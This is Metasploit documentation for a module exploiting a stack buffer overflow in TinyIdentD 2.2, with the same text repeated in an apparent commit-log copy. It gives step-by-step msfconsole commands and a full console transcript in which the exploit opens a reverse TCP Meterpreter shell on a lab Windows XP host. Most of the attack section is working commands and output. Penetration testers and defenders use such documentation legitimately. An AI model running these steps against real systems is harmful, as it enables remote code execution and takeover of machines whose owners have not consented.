documentation/modules/exploit/windows/misc/tiny_identd_overflow.md

## Vulnerable Application

  This module exploits a stack based buffer overflow in TinyIdentD
  version 2.2.

  If we send a long string to the ident service we can overwrite the
  return address and execute arbitrary code. Credit to Maarten Boone.

  Download:

  * https://download.cnet.com/Tiny-IdentD/3000-2150_4-10147419.html


## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/tiny_identd_overflow`
  3. `set RHOSTS <rhost>`
  4. `set TARGET <target>`
  5. `run`
  6. You should get a new session


## Options


## Scenarios

### TinyIdentD 2.2 on Windows XP SP0 - English (x86)

  ```
  msf5 > use exploit/windows/misc/tiny_identd_overflow
  msf5 exploit(windows/misc/tiny_identd_overflow) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   Automatic
     1   Windows 2000 Server SP4 - English
     2   Windows 2000 Pro All - English
     3   Windows 2000 Pro All - Italian
     4   Windows 2000 Pro All - French
     5   Windows XP SP0/1 - English
     6   Windows XP SP2 - English
     7   Windows XP SP2 - Italian


  msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
  target => 5
  msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
  rhosts => 172.16.191.140
  msf5 exploit(windows/misc/tiny_identd_overflow) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
  [*] Sending stage (176195 bytes) to 172.16.191.140
  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400

  meterpreter > sysinfo 
  Computer        : WINXP
  OS              : Windows XP (5.1 Build 2600).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter > 
  ```
Update TinyIdentD 2.2 Stack Buffer Overflow module 2020-05-23 04:43:44 +00:00			`## Vulnerable Application`

			`This module exploits a stack based buffer overflow in TinyIdentD`
			`version 2.2.`

			`If we send a long string to the ident service we can overwrite the`
			`return address and execute arbitrary code. Credit to Maarten Boone.`

			`Download:`

			`* https://download.cnet.com/Tiny-IdentD/3000-2150_4-10147419.html`


			`## Verification Steps`

			1. Start `msfconsole`
			2. `use exploit/windows/misc/tiny_identd_overflow`
			3. `set RHOSTS <rhost>`
			4. `set TARGET <target>`
			5. `run`
			`6. You should get a new session`


			`## Options`


			`## Scenarios`

			`### TinyIdentD 2.2 on Windows XP SP0 - English (x86)`

			```
			`msf5 > use exploit/windows/misc/tiny_identd_overflow`
			`msf5 exploit(windows/misc/tiny_identd_overflow) > show targets`

			`Exploit targets:`

			`Id Name`
			`-- ----`
			`0 Automatic`
			`1 Windows 2000 Server SP4 - English`
			`2 Windows 2000 Pro All - English`
			`3 Windows 2000 Pro All - Italian`
			`4 Windows 2000 Pro All - French`
			`5 Windows XP SP0/1 - English`
			`6 Windows XP SP2 - English`
			`7 Windows XP SP2 - Italian`


			`msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5`
			`target => 5`
			`msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140`
			`rhosts => 172.16.191.140`
			`msf5 exploit(windows/misc/tiny_identd_overflow) > run`

			`[*] Started reverse TCP handler on 172.16.191.165:4444`
			`[*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...`
			`[*] Sending stage (176195 bytes) to 172.16.191.140`
			`[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400`

			`meterpreter > sysinfo`
			`Computer : WINXP`
			`OS : Windows XP (5.1 Build 2600).`
			`Architecture : x86`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/windows`
			`meterpreter >`
			```